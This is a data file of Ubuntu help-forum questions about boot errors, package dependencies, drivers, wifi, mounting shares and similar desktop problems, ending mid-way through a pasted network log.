364768	xubuntu 13.04 64-bit , mountall error , ca n't boot	last night my laptop froze up and i had to do a hard shutdown . now xubuntu wo n't boot up . i was getting the error message `` mountall : error while loading shared libraries : libply-boot-client.so.2 : can not open shared object file : input/output error '' . i tried 'advanced options for ubuntu > recovery mode ' and selected fsck but received the same error . i searched for an answer with no success . an old post suggested using a live boot to mount and chroot the partition and update mountall but that did n't work . i now get a blinking cursor when trying to do a normal boot . i even tried to reinstall plymouth but received a message about breaking it . i was getting the error `` plymouth : error while loading shared libraries : libply.so.2 : can not open shared object files : input/output error '' beforehand but that stopped . please help .
364769	menubar visible pipelight on secondray screen	first of all , here is my setup : ubuntu 13.04 on a laptop , main display is the laptop screen , secondary display is my tv chrome pipelight ( microsoft silverlight running through wine ) a silverlight application in the secondary display ( netflix ) the problem is that , when i put netflix in fullscreen mode , the menubar remains visible on top of the secondary screen . apparently the aplication that has focus is microsoft silverlight . what can i do to solve this ?
364771	chromium always launches ubuntu one music	so for some reason the last couple of days , whenever i launch the chromium browser , it always opens to the ubuntu one music store web app . i have completely uninstalled ubuntu one , purged chromium twice and reinstalled it . i can open it from the terminal by using chromium-broswer , i locked that iteration to the launcher , but when i close it and reopen it , it launches as the music webapp . it 's really annoying . any ideas on how to fix it ? i 'm running 13.10 . edit some clarification . chromium does not open a regular browser window , it opens the the ubuntu one music webapp . no page tabs or anything . just the web app . this only happens when launching it from the unity dock . if i launch from the terminal it works fine , but if i close it and reopen it from the dock it takes me to the webapp . it will also open correctly from cairo dock . it 's just an issue with the unity dock . here is a screenshot of the webapp that 's after i opened chromium browser not the music webapp .
364772	file system does n't have expected sizes for windows to like it	i 'm trying to copy my partitions to another hard disk so that i can break the raid 0 that my laptop came with . i 'm using gparted . there 's a 40mb partition in the beginning of the hard disk ( raid array ) that is formatted as fat16 , has the flag diag and i believe has the dell diagnostic utility that one can run at boot . i get the following libparted message after the last step , which is grow the file system to fill the partition : file system does n't have expected sizes for windows to like it . cluster size is 2k ( 1k expected ) ; number of clusters is 20017 ( 39957 expected ) ; size of fats is 79 sectors ( 157 expected ) . is this safe to ignore ? i would like to have the diagnostic utility available after i restore the partitions back . if my understanding of the issue is correct , is there a way to tell gparted to use the correct cluster size , or is there a not-too-complicated way of copying just this partition manually ? to be safe , i want to preserve as much of the file system as possible . in case it 's relevant , the destination disk is an external 1tb hdd , and the raid also has total size 1tb .
364773	holding super key does n't show the number of the last unpinned app	do i need to file this as a bug ? look on the picture below : as you can see , i 'm on 13.10 live usb session . when i hold the super key , the last app on the launcher does n't show the 'number ' to press to get focus on it . i even tried to do super + '6 ' to see if it will focus the calc app but nothing happens . but if i 'm going to lock the 5th app ( texteditor ) on the launcher , the last app ( calc ) will show number '6 ' on it and i will be able to get focus onto it . but then again even the 5th app on the image ( texteditor ) is not a pinned app on the launcher so why does shortcut-number appears on it . i 'm using 13.10 amd64 bit os .
364774	copy files in a directory to another directory	new to ubuntu and i keep reading the stuff posted but it is n't working for me , help ! ! ! i am missing something hope someone can help . i am trying to copy files from one folder to another . when i do this it copies all folders into the the folder . the problem is i didnt want copies of all the folders i just wanted the files in the one folder to copy to another folder : cp -a /home/troy/downloads/ . /home/troy/.gs/
364775	can not install libgtkmm-2.4-dev in kubuntu 13.10 - unmet dependencies	i 'm trying to install grub-customizer in kubuntu 13.10 . after a lot of fiddling , following various online advice , i got to the point where i needed to install libgtkmm-2.4-dev ( which i know nothing about ) . here 's what i got when i tried : the following packages have unmet dependencies : libgtkmm-2.4-dev : depends : libgtk2.0-dev ( > = 2.24.0 ) but it is not going to be installed depends : libglibmm-2.4-dev ( > = 2.27.93 ) but it is not going to be installed depends : libpangomm-1.4-dev ( > = 2.27.1 ) but it is not going to be installed depends : libatkmm-1.6-dev ( > = 2.22.2 ) but it is not going to be installed and now i can get no further .
364776	will ubuntu 14.04 support wubi ? or will another alternate windows installer be available ? ( not 13.04 , 13.10 )	will ubuntu 14.04 support wubi ? or will another alternate windows installer be available ? i work on a lab network with pc devices which eth and usb hardware has been removed , and we use a different bus technology . wubi was the only way to install ubuntu , so we are waiting for wubi to be updated for the next lts release . we appreciate your advice and thank you for your help . -bran
364779	computer not recognizing 13.10 as a boot option after install from live usb	i am trying to dual boot windows 7 64 bit and saucy 64 bit on a non-uefi i5 sony vaio ( except with all vaio stuff removed ) laptop with 8 gb ram . this is not my first attempt at installing ubuntu ; i have installed 12.04 using wubi on the same computer before . after i decided i wanted to move up to 13.10 . i went on windows and deleted my single ubuntu partition , hoping to be able to easily install 13.10 with wubi like i had with 12.04 , not knowing that the feature had been discontinued . i then used universal-usb-installer-1.9.4.2.exe to put the image onto a 16 gb usb drive and booted from it . i ran the install , creating a new ext4 partition from gparted from within the installer ( i did not make a swap partition because i figured 8 gb memory should be enough , as the message made it sound like a swap was optional ) , and encountering no problems . at the end , i restarted like it asked me to , and it did not give the option to boot ubuntu , instead immediately booting 7 . after a few f-key mashes , i found that there is not an option for booting ubuntu . so , i tried again after reformatting the partition . then , after it still did n't work , i tried to run the installer from within the actual demo , but it did n't work and from then on it would no longer boot from the usb . so , then i tried burning the image onto a dvd-r ( but it would never burn using the default windows program , it would eject the disk before starting , so i used winrar to extract the .iso onto it ) and tried to boot from it , but it never did . why , with all of these attempts , did it not work ? i 'm especially confused about the attempts using the usb , as there were never any issues with the install but it never booted .
364781	try to install gnome shell in saucy	i try to install gnome-shell in saucy but it wo n't work . and i installed the 13.10 in parallels desktop on a mac . sudo apt-get install gnome-shell reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : gir1.2-clutter-1.0 ( > = 1.11.11 ) but it is not installable depends : gir1.2-mutter-3.0 ( > = 3.8.3 ) but it is not going to be installed depends : gir1.2-telepathyglib-0.12 but it is not installable depends : gir1.2-accountsservice-1.0 but it is not installable depends : gir1.2-gcr-3 ( > = 3.7.5 ) but it is not installable depends : gir1.2-gkbd-3.0 but it is not installable depends : gir1.2-gnomedesktop-3.0 ( > = 3.7.90 ) but it is not installable depends : gir1.2-nmgtk-1.0 but it is not installable depends : gir1.2-polkit-1.0 but it is not installable depends : gir1.2-telepathylogger-0.2 ( > = 0.8.0 ) but it is not installable depends : gir1.2-upowerglib-1.0 but it is not installable e : unable to correct problems , you have held broken packages .
364787	ubuntu 13.10 - now wifi is disabled by default ?	in previous version ( 13.04 ) after reboot wifi was connecting automatically by default ( no special settings ) . now after clean installation 13.10 wifi is disabled by default . i must click icon in upper right menu and click enable wifi . by the way - system settings- > network window appears only for a moment and disappears . i 've got old hp nc4400 with intel 3945abg mow2 card .
364788	how to install tex live in ubuntu ? ( any version )	i would like to use tex live in ubuntu , how do i install it ? should i add a ppa or download from the main site ?
364790	code returns nothing	the following program was made according to the book 'head first c ' . it is supposed to be able to find and return music tracks containing a search-word , but it returns nothing . oh , and i tried to make a 'code ' space - indented it by four , but forgive me if it does n't work . # include < stdio.h > # include < string.h > char tracks [ ] [ 80 ] = { `` i left my heart in harvard med school '' , `` newark , newark - a wonderful town '' , `` dancing with a dork '' , `` from here to maternity '' , `` the girl from iwo jima '' , } ; void find_track ( char search_for [ ] ) { int i ; for ( i = 0 ; i < 5 ; i++ ) { if ( strstr ( tracks [ i ] , search_for ) ) printf ( `` match found.track % i : ' % s'\n '' , i , tracks [ i ] ) } } int main ( ) { char search_for [ 80 ] ; printf ( `` search for : `` ) ; fgets ( search_for , 80 , stdin ) ; find_track ( search_for ) ; return 0 ; }
364793	does the `` security '' repository provides anything not found in the `` updates '' repository ?	for the limited number of package i looked at ( e.g . apache ) , i found that the package version in the updates repository is always newer than or equal to the version available in the security repository ( provided that they exist ) . this gives me the impression that all security patches posted to the security repository are also posted to the updates repository . if this is true , i can remove all < release_name > -security entries in my apt sources.list and the < release_name > -updates entries will still give me the security patches . this will speed up apt-get update quite a bit . the best documentation i can found regarding the repositories is on the community help page '' important security updates ( raring-security ) '' . patches for security vulnerabilities in ubuntu packages . they are managed by the ubuntu security team and are designed to change the behavior of the package as little as possible -- in fact , the minimum required to resolve the security problem . as a result , they tend to be very low-risk to apply and all users are urged to apply security updates . `` recommended updates ( raring-updates ) '' . updates for serious bugs in ubuntu packaging that do not affect the security of the system . however , it does not mention whether the updates repository also includes everything in the security repository . can anyone confirm ( or disconfirm ) this ?
364797	could not write pid file /dev/.initanfs/plymouth.pid	i got an error when i boot my ubundu 10.04 lts server could not write pid file /dev/.initanfs/plymouth.pid no such file or directory can anyone tell me how to fix it ?
364798	unmet dependencies while installing wine	hello i am new here and i have been trying to install wine : $ sudo apt-get install wine1.7 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-i386 ( = 1.7.4-0ubuntu4 ) but it is not installable e : unable to correct problems , you have held broken packages . what should i do ?
364799	3rd party excel add-in on ubuntu	i 'm looking to move to ubuntu . one concern is the use of third party add-ins/vba for microsoft excel . http : //code.google.com/p/finansu/ or generally stuff like these : http : //www.skilledup.com/learn/business-entrepreneurship/mostly-free-excel-add-ins/ will that be supported and how so ? many thanks
364806	windows 7 dual boot ubuntu installation stops in midway	i downloaded ubuntu iso file from the site and burnt the image to a dvd . i boot my windows 7 laptop using the dvd , the screen shows all the options and then when i select `` install ubuntu along with windows 7 '' , it takes a while and then the dvd gets ejected `` eject the media and press enter `` and the system reboots into windows 7 .
364807	ubuntu server shh backspace bad character	so while while i 'm using ssh to connect my server the backspace shows me bad character . the backspace is the one with question mark . the backspace itself works normally , but in the screen , it was n't very neat to look stacking question mark . this is the example . the square-bracketed question mark means backspace . cat [ ? ] output : ca : not found cat [ ? ] [ ? ] output : c : not found cat [ ? ] [ ? ] [ ? ] output : nothing , because it simple delete the 3 character . please help . thank you .
364810	ubuntu 12.04.3 - reverse dns issue - slow ping interval but normal ping value	i 'm running ubuntu 12.04.3 x86 desktop in my corporation environment . i join the corp domain by likewise open . but when i ping another pc , say hostname is pc-test , `` ping pc-test '' or `` ping pc-test.domain.name '' returns slow interval ( about 5 seconds ) but the ping value is below 1 ms . when i use `` ping -n pc-test '' , everything works well . so i conclude this is about reverse dns issue . how to fix this issue ? many thanks ! edit : in my understanding , reverse dns issue is related to dns server or wins server , not only an ubuntu issue , is this right ? if i wan na fix this issue as much as possible on ubuntu but not on network servers , what to do ?
364817	windows 7 wo n't boot ? tried boot repair ( dual-boot )	i downloaded ubuntu and installed it so that my computer was dual boot . the first day , ubuntu and windows both worked great . unfortunately , the next day , after messing around on compiz config settings manager to get the rotation cube , i tried booting into windows 7 , and it would n't boot . it just goes to the screen where the windows logo comes up and says windows 7 , and then reboots without even displaying an error message . i tried boot repair and it did n't work , the problem 's still there . how can i fix this ? ps : here 's the link that boot repair gave to me : http : //paste.ubuntu.com/6287090
364821	reset maas after loosing juju configuration ?	i managed to delete my juju client cofiguration without running a juju destroy-environment first , leaving my maas in a state where i could not deploy to it . i would get the following ( conflicting ) output $ juju bootstrap error environment is already bootstrapped $ juju status error unable to connect to environment `` '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : no instances found so , i tried running juju destroy-environment with the new config , to see if it would clean up the old juju environment on the maas system . it gave me the error `` error gomaasapi : got error back from server : 409 conflict '' . i went into the maas gui and stopped the leftover machines , and then deleted all the nodes and had then go through the discovery and commissioning stages again , but i still got the same errors after all that ! is there a way to reset this ?
364822	`` please insert proper boot device ''	after i install linux with no problems and load into the os again with no problems the first time i restart the computer it will no longer load up linux again . instead it asks me to insert a proper boot device or insert boot media into the drive . i was wondering if anybody could help me with this .
364824	logitech c525 on ubuntu 12.04 no /dev/videox but in lsusb	i am trying to get a logitech c525 camera to work on ubuntu 12.04 . the system is a hp pavilion hpe h8-1050z with 2.0 usb ports on the front and 3.0 ports on the back . i have tried both types of ports . i have tried cheese and skype , i get no device found . ls /dev/video* does not exist . but i find the device using lsusb -v bus 001 device 004 : id 046d:0826 logitech , inc bdeviceclass 239 miscellaneous device i am not sure how to get this running . the device does not have a on off switch so i assume it is on . i have tested it on a windows 7 machine and it works . i have tried rebooting with the camera plugged in and not plugged in . i also have mythtv running on this machine , not sure if that would cause any issues . thanks for any help aaron
364825	gt 54om isnt being used when playing games	so i just installed ubuntu 13.10 and after looking everywhere on how to install steam , i download tf2 and its lagging and has no aa , so i check and im not using my real gpu , instead im using my intel integrated gpu , help !
364826	ubuntu freezes on third or fifth dot when preparing to load for the first time	i have a toshiba a105-s2236 that i down-graded from vista to xp and could n't find a wireless driver for it . i heard about ubuntu and thought maybe id give it a try . i installed it and went to load it and now it always stuck on the preparing to load ubuntu for the first time screen it always freezes and never loads . i do n't know why .
364829	what command to use to open sublime ?	i 've installed sublime in ubuntu , but i just do n't know how to launch it . is there any special command to launch it ? please note that i 've already read this post , but it did n't solved the problem . i just want to open a blank new file .
364834	sharing ubuntu with virtual box	i want to make a virtual machine of ubuntu on sun virtualbox and share with my friends . it is for educational purposes . i can do it ? ?
364837	my keyboard keys stopped functioning and system behave strange	my system was working fine . when i started my system again ; fn key , ctr key was not working . later i found that my fn key was working as a ctrl . but leaving a-z and 1-9 other key function does not work . network connection is also not starting . i am using ubuntu 12.10 . am i victim of any attack ?
364840	i downloaded ubuntu from the web , but it wants to install by rebooting from the cd	i downloaded ubuntu from the internet , but when i try to open the installation application , it wants me to reboot my computer with the cd in the tray . you can see how this may pose a problem considering i do n't have a cd since i downloaded from the website . i tried rebooting my computer anyway , and it did n't work . how do i fix this problem ? by the way , my current os is windows 8 , if that makes any difference .
364842	how to activate the help button in spider solitaire	linux includes a very nice spider solitaire game in the `` spider '' package . the game , however , has a help button that 's greyed out . i do know how to play the game , so this is more a matter of aesthetics -- but what does it take to make the help button actually bring up the help ? ( the help files are in /usr/share/doc/spider in .gz form , but the help button does n't know about them . )
364843	alias substitution for a string to use it in a terminal command	is there a way to substitute aliases such that it is appended or prepended to an existing command in the shell ? for example , defining the alias : alias execloc='/home/user/' prepending this to a command in the bash terminal : cd exeloc/temp/somefolder can something like this be done , or is there a way to do it ?
364848	tool for automating video splicing at slide transitions ?	i 've got a bunch of hour-long videos i want to split out into 5-10 minute pieces . so far i 've simply used the openshot video editor to identify good splice points , and the blazingly fast avconv command-line program to copy out the actual audio and video without changing any formats or codecs . then it is easy to upload that to youtube via the google command-line tool . but i 'm looking for something to help automatically find the right splice points . the video is mostly static slides with some real-time handwriting going on . so e.g . a script that would process the video and give me timestamps for the major video transitions ( slide transitions ) would help a lot , especially if it could then back up and go forward from those transitions to eliminate silence . is something like that available ? are other fast/easy video editing pipelines for this sort of work out there ?
364849	mic does n't work properly	i tried many things to do , but got even worse . now there 's no mic in alsamixer . instead of recording from mic , it records sound from speakers . arecord -l : card 0 : pch [ hda intel pch ] , device 0 : conexant analog [ conexant analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0
364852	bad sip uri in to header field	hello we are creating asterisk < - > lync trunk . the asterisk is under providers control . i am in charge of lync . i 'm slightly familiar with asterisk . we created trunk . everything was fine until provider restarted their asterisk server . now the asterisk sends strangre sip invites with sip : xxx.xxx.xxx.xxx:5068 ( where xxx.xxx.xxx.xxx is the ip address of the lync server ) in to header field . before restart it was something like sip : username @ xxx.xxx.xxx.xxx . provider does n't know what to do . we are close to deadline with the project . what do you think should we do to make to sip uri be like that sip : username @ xxx.xxx.xxx.xxx ? than you in advance .
364853	every time i open the software center it hangs then closes it self . i got this error log from the terminal	** ( software-center:6812 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-cx8kansilp : connection refused 2013-10-23 22:48:44,222 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-10-23 22:48:57,143 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-10-23 22:48:57,279 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-10-23 22:48:57,526 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-10-23 22:48:57,526 - root - error - could not find any typelib for launchpadintegration 2013-10-23 22:49:00,349 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-10-23 22:49:45,431 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-10-23 22:49:45,430 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . 2013-10-23 22:51:44,641 - softwarecenter.db.utils - info - software-center-agent finished with status 0 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1375 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1313 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 240 , in init_view vm.display_page ( self , self.pages.lobby , self.state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 183 , in display_page pane.enter_page ( page , view_state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 637 , in enter_page self.display_lobby_page ( state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 652 , in display_lobby_page self._clear_search ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 559 , in _clear_search self.searchentry.clear_with_no_signal ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/searchentry.py '' , line 120 , in clear_with_no_signal self.handler_block ( self._handler_changed ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gobject.py '' , line 454 , in signal_handler_block gobjectmodule.signal_handler_block ( _get_instance_for_signal ( obj ) , handler_id ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 113 , in function return info.invoke ( *args , **kwargs ) typeerror : argument instance : expected gobject.object , but got pycobject
364857	wifi not connecting after unsuccessful upgrade in 13.04	i have ubuntu 13.04 installed in my laptop . i tried to upgrade it to the new release ubuntu 13.10 , unfortunately the system hanged up during the upgrade so i need to reboot my laptop . after the reboot i got this filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored . i was able to fix the error through the following commands in the terminal : mount -o remount , rw / dpkg -- configure -a mount -o remount , ro / sync reboot after successfully recovering my ubuntu 13.04 , i ca n't connect to any available wifi connection . whenever i try to click any wifi connection , i am getting this error : connection activation failed . ( 32 ) not authorized to control networking .
364868	brightness at 100 % since updating from kubuntu 13.04 to 13.10	since i 've updated to kubuntu 13.10 my brightness level is at 100 % . i already googled around and tried different tips , but none of them worked . i 've edited /etc/default/grub to grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' acpi_osi= '' linux '' also i 've tried uninstalling and reinstalling the proprietary ati fire gl driver , but i think i 've completely messed up the system by doing so , because now the /sys/class/backlight/ directory is empty which was n't before . unfortunately i do n't know how to get it back . also since then the settings for adjusting the screen brightness in the power management are gone . i have a toshiba satellite pro notebook . naturally the fn keys for adjusting the brightness do n't work either , but worked fine on 13.04 . i 'd be glad if someone could help me there since my eyes ca n't handle this brightness . ; ) edit : i 've solved this by following the steps in 2.1 of https : //help.ubuntu.com/community/binarydriverhowto/ati for un-installing the installed driver . in short i did the following : sudo cp /etc/x11/xorg.conf /etc/x11/xorg.conf.bak sudo apt-get remove -- purge fglrx fglrx-amdcccle sudo apt-get remove -- purge fglrx-updates fglrx-amdcccle-updates after the reboot my screen went black . first i was afraid i messed something up , but then i tried using the fn-keys to bring up the brightness and they worked ! then i followed the rest of the steps in 2.1 and installed the drivers again , but after the restart , the brightness was stuck at 100 % again , so i did the un-installation steps again and the brightness control works again . i 'm just not sure if i should try installing the catalyst drivers directly from the amd 's page or not . but for the moment everything seems to be ok , except of the fact that i 'm running with the default drivers .
364869	remove string and replace a new string with format	here is i want : i have a .doc file which consists of many lines . in the file i need to find a string and replace it with another string . up to this fine . but how can i replace the string with another string along with format . i mean like bold , italic , underline , etc . for new string .
364872	how to view a doc from command line ?	as i mentioned there , how can i view documents ( ex : .doc , .docx and all other formats ) from the command line ? is there any way ? thank you .
364874	can not install gnome on ubuntu 12.4 lts , getting 404 on a .deb package	i am trying to install gnome through software center and i got error during download . here is the error . failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/a/accountsservice/gir1.2-accountsservice-1.0_0.6.15-2ubuntu9.6_i386.deb 404 not found [ ip : 91.189.91.15 80 ] how do i install gnome ?
364882	ubuntu jeos vm clone has a much larger disk size than the original vm ?	i am creating ubuntu jeos vms on virtualbox . the vm created has an actual size ( on disk ) 59 mb , but when i clone the vm , the actual disk size of the cloned vm is 1.73 gb . however , virtual size of both the actual vm as well as the cloned vm is 2.00 gb . note : i am checking the size of the vms by settings -- > storage -- > storage tree -- > controller : sata , clicking on the .vmdk image appearing there and viewing viewing its attributes , which have the following fields : type : virtual size : actual size : details : location : attached to : my question is why does the clone has a much larger size than the original vm ? any help would be much appreciated.. thank you .
364884	ubuntu 13.10 skype restore hidden icon on notification bar	after upgrading ubuntu to version 13.10 in the notification bar next to the clock is missing the skype icon . skype_hidden_icon1 skype_hidden_icon2 how can i restore it ? thanks in advance sorry for my bad en .
364889	error : unknown filesystem grub rescue help after updating windows 8.1 with ubuntu 13.10	all , i have laptop which dualboots windows 8 and ubuntu 13.10 for more than 4 months . there is no problem so far . i have got a update for windows 8 i.e. , windows 8.1 update and updated the system . after updating to windows 8.1 , grub menu is not displayed . after powering on system directly booted into windows . on changing the boot order to ubuntu , i got below error error : unknown filesystem grub rescue > i guess there is some problem in grub . i have few questions , i assume , there is no problem with windows 8.1 bootloader , so ubuntu bootloader need to be repaired . please confirm . how to fix this grub issue ? ? ( i am unable to boot into ubuntu13.10 . am i need to use live cd ? ) please guide me in step by step .
364890	reliance netcnnect	my reliance netconnect is not being detected . i have ubuntu 12.04 and in it wvidal is also not installed.so please help me to connect reliance netconnect and install wvidal . i have windows installed in other pc .
364891	driver problems ?	i 've installed v13.04 on my fujitsu u2010 and it 's sluggish in general . takes more than 5 seconds for screens or menu 's to pop up and windows appear in slow motion . ironically , the same 13.04 runs smoothly on my u1010 which is one generation older with slower cpu . the hardware specs are : atom z530 cpu ; intel gma 500 gpu ; 1gb ram ; fujitsu fuj02b1 chip sets ; fujitsu fuj02e3 chip sets ; realtek 8139 ; realtek alc269 . video plays ok but the audio part is a disaster , it 's like switching audio on and off continuously , did n't matter i was watching youtube or making a skype call . same problem i play the audio with internal speakers or headphones . no problem with audio with bluetooth headsets though . plus hibernation can put the computer to shutdown but wake up with a flaky screen that i ca n't even see my mouse cursor . do n't know which one of those is causing problems . can someone help ? thanks , yk
364892	install ubuntu for phones on galaxy tab gt p1000	i would like to install newly released ubuntu for phones , on my samsung galaxy tab : gt p1000 . please guide me .
364893	ubuntu 13.10 not detecting nvidia gpu	i installed 13.10 just yesterday and it did n't detect my nvidia 420m gpu . i am using a dell xps laptop with optimus . i checked in software update app -- > additional driviers but the drivers option did n't show up . when i installed 12.04 lts a month ago , it automatically detected nvidia card and updated to v319 ( recommended ) drivers.now it just does n't detect at all . i am new to ubuntu , help !
364894	how to write the path to a windows shared folders address in terminal ?	i want to permanently mount a few windows shared folders . i googled that topic and found a lot of good answers , but with all the solutions i have a little problem : i believe i ca n't properly give an address of shared folder . i can find it following way : `` network '' - > `` windows network '' - > `` workgroup_name '' - > `` computer_name '' - and there is some folder i would like to mount . how can i write the path to the folders in terminal ? upd i can access needed folder throw address in location bar smb : //server/ro/ , but i try mount it by editing /etc/fstab file ( using guide https : //wiki.ubuntu.com/mountwindowssharespermanently ) i get error mount error : could not resolve address for server : unknown error ps in /etc/fstab : //server/ro /media/server cifs username=user , password=pwd , uid=1000 , iocharset=utf8 0 0
364895	what is universe resource ?	i tried to install vlc , chromium etc from ubuntu software centre . it shows tht repository cant be read . they ask for server config and all . what is this universe resource . too much confused .
364896	migrate server with clonezilla to larger disk	i have a virtual ubuntu server with a 40 gb hdd . i used clonezilla and created an disk image of that server . the reason i want to clone it is because of disk space ( i need more ) . the other server is in a hp blade center , so it 's a phisicial one with a 200 gb disk . when i restore the image to the new server it only restores the 40 gb , it did n't expand the disk . i have also tried with the clonezilla advanced mode where i used the '-k ' and '-r ' options to create the partition table proportionally in the target disk and resize the file system in the partition automatically . but that di n't solve my problem . do you know any way of how can the image be restored so that i have all the 200gb ? or do you even know a better way that clonezilla to do this migration ?
364900	ubuntu 13.10 wifi timeout	[ my problem is similar to kubuntu 13.10 wifi does n't work - dhcp timeout but seems more tenacious . ] i have two wireless routers i can easily test : a router installed by my service provider telenet.be a dlink di-524up ( which is connected via wired network to the first router ) after upgrading from ubuntu 13.04 to 13.11 , i can connect smoothly to the internet via my dlink wireless router ( surprisingly , since on 13.04 this was the slowest router ) however , the two wireless networks provided by the telenet.be router ( one password-protected and one open ) fail . it seems that getting an ip address times out : janr @ guzumi : ~ $ lspci | grep -i wireless 12:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) janr @ guzumi : ~ $ sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:12:00.0 logical name : eth1 version : 01 serial : c0 : cb:38:81:85 : f8 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.24.101 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : fbb00000-fbb03fff *-network disabled description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:13:00.0 logical name : eth0 version : 03 serial : f0:4d : a2 : b5:50 : b0 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport : e000 ( size=256 ) memory : d0b04000-d0b04fff memory : d0b00000-d0b03fff memory : fba00000-fba1ffff /var/syslog says : oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) starting connection 'telenet-ee09a' oct 24 09:01:13 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] oct 24 09:01:13 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... oct 24 09:01:13 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] oct 24 09:01:13 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1/wireless ) : access point 'telenet-ee09a ' has security , but secrets are required . oct 24 09:01:13 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] oct 24 09:01:13 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 2 of 5 ( device configure ) complete . oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... oct 24 09:01:13 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] oct 24 09:01:13 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... oct 